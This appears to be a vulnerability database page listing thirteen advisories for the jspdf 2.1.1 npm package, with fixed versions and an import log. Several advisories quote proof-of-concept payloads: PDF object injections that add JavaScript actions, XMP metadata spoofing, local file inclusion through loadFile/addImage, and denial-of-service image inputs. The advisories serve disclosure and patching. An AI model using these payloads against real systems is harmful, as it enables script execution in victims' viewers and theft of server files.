Package details: pkg:npm/jspdf@2.1.1
purl pkg:npm/jspdf@2.1.1
Next non-vulnerable version 4.2.1
Latest non-vulnerable version 4.2.1
Risk 4.5
Vulnerabilities affecting this package (13)
Vulnerability Summary Fixed by
VCID-2555-3wmg-bke6
Aliases:
CVE-2026-24133
GHSA-95fx-jjr5-f39c
jsPDF Vulnerable to Denial of Service (DoS) via Unvalidated BMP Dimensions in BMPDecoder

User control of the first argument of the `addImage` method results in Denial of Service. If given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful BMP file that results in out of memory errors and denial of service. Harmful BMP files have large width and/or height entries in their headers, which lead to excessive memory allocation. Other affected methods are: `html`.

Example attack vector:

```js
import { jsPDF } from "jspdf"

// malicious BMP image data with large width/height headers
const payload = ...

const doc = new jsPDF();
doc.addImage(payload, "BMP", 0, 0, 100, 100);
```
4.1.0
Affected by 5 other vulnerabilities.
VCID-4rm1-7nm2-7kfn
Aliases:
CVE-2026-24737
GHSA-pqxr-3g65-p328
jsPDF has PDF Injection in AcroFormChoiceField that allows Arbitrary JavaScript Execution

User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are:

* `AcroformChoiceField.addOption`
* `AcroformChoiceField.setOptions`
* `AcroFormCheckBox.appearanceState`
* `AcroFormRadioButton.appearanceState`

Example attack vector:

```js
import { jsPDF } from "jspdf"

const doc = new jsPDF();
var choiceField = new doc.AcroFormChoiceField();
choiceField.T = "VulnerableField";
choiceField.x = 20;
choiceField.y = 20;
choiceField.width = 100;
choiceField.height = 20;

// PAYLOAD:
// 1. Starts with "/" to bypass escaping.
// 2. "dummy]" closes the array.
// 3. "/AA" injects an Additional Action (Focus event).
// 4. "/JS" executes arbitrary JavaScript.
const payload = "/dummy] /AA << /Fo << /S /JavaScript /JS (app.alert('XSS')) >> >> /Garbage [";

choiceField.addOption(payload);
doc.addField(choiceField);
doc.save("test.pdf");
```
4.1.0
Affected by 5 other vulnerabilities.
VCID-5hnn-r83k-u3ba
Aliases:
CVE-2026-25940
GHSA-p5xg-68wr-hm3m
jsPDF has a PDF Injection in AcroForm module allows Arbitrary JavaScript Execution (RadioButton.createOption and "AS" property)

User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option.

* `AcroformChildClass.appearanceState`

Example attack vector:

```js
import { jsPDF } from "jspdf"

const doc = new jsPDF();
const group = new doc.AcroFormRadioButton();
group.x = 10;
group.y = 10;
group.width = 20;
group.height = 10;
doc.addField(group);

const child = group.createOption("opt1");
child.x = 10;
child.y = 10;
child.width = 20;
child.height = 10;
child.appearanceState = "Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>";

doc.save("test.pdf");
```
4.2.0
Affected by 2 other vulnerabilities.
VCID-6pvn-kfpj-e3g7
Aliases:
CVE-2026-31898
GHSA-7x6v-j9x4-qf24
jspdf: jsPDF: Arbitrary code execution via unsanitized input in createAnnotation method
4.2.1
Affected by 0 other vulnerabilities.
VCID-e3uy-gm2d-w3bk
Aliases:
CVE-2021-23353
GHSA-57f3-gghm-9mhc
Improper Input Validation. This affects the package jspdf: ReDoS is possible via the `addImage` function.
2.3.1
Affected by 12 other vulnerabilities.
VCID-fdf6-8j56-qqc6
Aliases:
CVE-2026-25535
GHSA-67pg-wm7f-q7fj
jsPDF Affected by Client-Side/Server-Side Denial of Service via Malicious GIF Dimensions

User control of the first argument of the `addImage` method results in denial of service. If given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful GIF file that results in out of memory errors and denial of service. Harmful GIF files have large width and/or height entries in their headers, which lead to excessive memory allocation. Other affected methods are: `html`.

Example attack vector:

```js
import { jsPDF } from "jspdf"

// malicious GIF image data with large width/height headers
const payload = ...

const doc = new jsPDF();
doc.addImage(payload, "GIF", 0, 0, 100, 100);
```
4.2.0
Affected by 2 other vulnerabilities.
VCID-g47z-ehg3-vqbb
Aliases:
CVE-2026-24043
GHSA-vm32-vv63-w422
jsPDF Vulnerable to Stored XMP Metadata Injection (Spoofing & Integrity Violation)

User control of the first argument of the `addMetadata` function allows users to inject arbitrary XML. If given the possibility to pass unsanitized input to the `addMetadata` method, a user can inject arbitrary XMP metadata into the generated PDF. If the generated PDF is signed, stored or otherwise processed after, the integrity of the PDF can no longer be guaranteed.

Example attack vector:

```js
import { jsPDF } from "jspdf"

const doc = new jsPDF()

// Input a string that closes the current XML tag and opens a new one.
// We are injecting a fake "dc:creator" (Author) to spoof the document source.
const maliciousInput =
  '</jspdf:metadata></rdf:Description>' +
  '<rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/">' +
  '<dc:creator>TRUSTED_ADMINISTRATOR</dc:creator>' + // <--- Spoofed Identity
  '</rdf:Description>' +
  '<rdf:Description><jspdf:metadata>'

// The application innocently adds the user's input to the metadata
doc.addMetadata(maliciousInput, "http://valid.namespace")
doc.save("test.pdf")
```
4.1.0
Affected by 5 other vulnerabilities.
VCID-h1m4-jwms-tqee
Aliases:
CVE-2026-31938
GHSA-wfv2-pwc8-crg5
jspdf: jsPDF: Cross site scripting via unsanitized output options
4.2.1
Affected by 0 other vulnerabilities.
VCID-hu3v-vhnb-kuhw
Aliases:
CVE-2026-25755
GHSA-9vjf-qc39-jprp
jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method

User control of the argument of the `addJS` method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.

```js
import { jsPDF } from "jspdf";

const doc = new jsPDF();

// Payload:
// 1. ) closes the JS string.
// 2. > closes the current dictionary.
// 3. /AA ... injects an "Additional Action" that executes on focus/open.
const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";

doc.addJS(maliciousPayload);
doc.save("vulnerable.pdf");
```
4.2.0
Affected by 2 other vulnerabilities.
VCID-jcat-3b8h-c7hw
Aliases:
CVE-2025-57810
GHSA-8mvj-3j78-4qmw
jsPDF Denial of Service (DoS)

User control of the first argument of the `addImage` method results in CPU utilization and denial of service. If given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful PNG file that results in high CPU utilization and denial of service. Other affected methods are: `html`.

Example payload:

```js
import { jsPDF } from "jspdf"

const payload = new Uint8Array([117, 171, 90, 253, 166, 154, 105, 166, 154])

const doc = new jsPDF();
const startTime = performance.now();
try {
  doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} finally {
  const endTime = performance.now();
  console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`);
}
```
3.0.2
Affected by 10 other vulnerabilities.
VCID-t6gm-egg6-eua6
Aliases:
CVE-2025-68428
GHSA-f8cm-6447-x5h2
jsPDF has Local File Inclusion/Path Traversal vulnerability

User control of the first argument of the `loadFile` method in the node.js build allows local file inclusion/path traversal. If given the possibility to pass unsanitized paths to the `loadFile` method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs. Other affected methods are: `addImage`, `html`, `addFont`. Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files.

Example attack vector:

```js
import { jsPDF } from "./dist/jspdf.node.js";

const doc = new jsPDF();
doc.addImage("./secret.txt", "JPEG", 0, 0, 10, 10);
doc.save("test.pdf"); // the generated PDF will contain the "secret.txt" file
```
4.0.0
Affected by 9 other vulnerabilities.
VCID-wg74-rver-pqa7
Aliases:
CVE-2026-24040
GHSA-cjw8-79x6-5cj4
jsPDF has Shared State Race Condition in addJS Plugin

The `addJS` method in the jspdf Node.js build utilizes a shared module-scoped variable (`text`) to store JavaScript content. When used in a concurrent environment (e.g., a Node.js web server), this variable is shared across all requests. If multiple requests generate PDFs simultaneously, the JavaScript content intended for one user may be overwritten by a subsequent request before the document is generated. This results in Cross-User Data Leakage, where the PDF generated for User A contains the JavaScript payload (and any embedded sensitive data) intended for User B. Typically, this only affects server-side environments, although the same race conditions might occur if jsPDF runs client-side.

```js
import { jsPDF } from "jspdf";

const docA = new jsPDF();
const docB = new jsPDF();

// 1. User A sets their script (stored in shared 'text' variable)
docA.addJS('console.log("Secret A");');

// 2. User B sets their script (overwrites shared 'text' variable)
docB.addJS('console.log("Secret B");');

// 3. User A saves their PDF (reads current 'text' variable)
docA.save("userA.pdf");

// Result: userA.pdf contains "Secret B" instead of "Secret A"
```
4.1.0
Affected by 5 other vulnerabilities.
VCID-xufv-a7d6-pbfa
Aliases:
CVE-2025-29907
GHSA-w532-jxjh-hjhj
jsPDF Bypass Regular Expression Denial of Service (ReDoS)

User control of the first argument of the `addImage` method results in CPU utilization and denial of service. If given the possibility to pass unsanitized image urls to the `addImage` method, a user can provide a harmful data-url that results in high CPU utilization and denial of service. Other affected methods are: `html`, `addSvgAsImage`.

Example payload (truncated on this page):

```js
import { jsPDF } from "jspdf"
```
3.0.1
Affected by 11 other vulnerabilities.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-06-06T07:29:04.789347+00:00 GitLab Importer Affected by VCID-h1m4-jwms-tqee https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-31938.yml 38.6.0
2026-06-06T07:28:21.647124+00:00 GitLab Importer Affected by VCID-6pvn-kfpj-e3g7 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-31898.yml 38.6.0
2026-06-06T06:55:27.521071+00:00 GitLab Importer Affected by VCID-hu3v-vhnb-kuhw https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-25755.yml 38.6.0
2026-06-06T06:55:17.656697+00:00 GitLab Importer Affected by VCID-fdf6-8j56-qqc6 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-25535.yml 38.6.0
2026-06-06T06:54:48.912859+00:00 GitLab Importer Affected by VCID-5hnn-r83k-u3ba https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-25940.yml 38.6.0
2026-06-06T06:48:08.830107+00:00 GitLab Importer Affected by VCID-g47z-ehg3-vqbb https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-24043.yml 38.6.0
2026-06-06T06:47:57.718720+00:00 GitLab Importer Affected by VCID-2555-3wmg-bke6 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-24133.yml 38.6.0
2026-06-06T06:47:36.774106+00:00 GitLab Importer Affected by VCID-wg74-rver-pqa7 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-24040.yml 38.6.0
2026-06-06T06:47:30.353870+00:00 GitLab Importer Affected by VCID-4rm1-7nm2-7kfn https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2026-24737.yml 38.6.0
2026-06-06T06:35:00.093272+00:00 GitLab Importer Affected by VCID-t6gm-egg6-eua6 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2025-68428.yml 38.6.0
2026-06-06T06:02:02.282542+00:00 GitLab Importer Affected by VCID-jcat-3b8h-c7hw https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2025-57810.yml 38.6.0
2026-06-06T05:42:32.408891+00:00 GitLab Importer Affected by VCID-xufv-a7d6-pbfa https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2025-29907.yml 38.6.0
2026-06-04T20:46:01.706530+00:00 GitLab Importer Affected by VCID-e3uy-gm2d-w3bk https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/jspdf/CVE-2021-23353.yml 38.6.0